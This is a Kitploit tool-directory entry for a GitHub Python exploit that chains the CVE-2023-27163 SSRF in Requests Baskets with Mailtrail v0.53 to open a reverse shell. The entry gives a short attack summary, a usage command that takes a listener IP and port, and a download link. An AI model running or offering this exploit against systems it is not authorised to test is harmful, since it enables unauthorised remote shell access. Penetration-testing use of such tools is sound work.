Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/hhesenjan/cve-2023-27163-and-mailtrail-v0.53
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubhhesenjan/cve-2023-27163-and-mailtrail-v0.53

CVE-2023-27163-AND-Mailtrail-v0.53

Python exploit chaining CVE-2023-27163 SSRF in Requests Baskets with Mailtrail v0.53 to forward internal services and execute a reverse shell.

View Repository
213 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Automatic Exploit

Summary

The following exploit abuses Requests Baskets v1.2.1 SSRF vulnerability to forward the internal application running at 127.0.0.1:80 to the external application at /pwned. Once the Mailtrail v0.53 application has been forwarded it will execute a reverse shell command against it and within a few seconds the user should obtain a reverse shell onto the machine.

Command

root@kitploit:~
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT

Exploits:

  • CVE-2023-27163
  • Mailtrail v0.53

Credits

  • https://github.com/overgrowncarrot1
  • https://github.com/spookier/Maltrail-v0.53-Exploit
Download Tool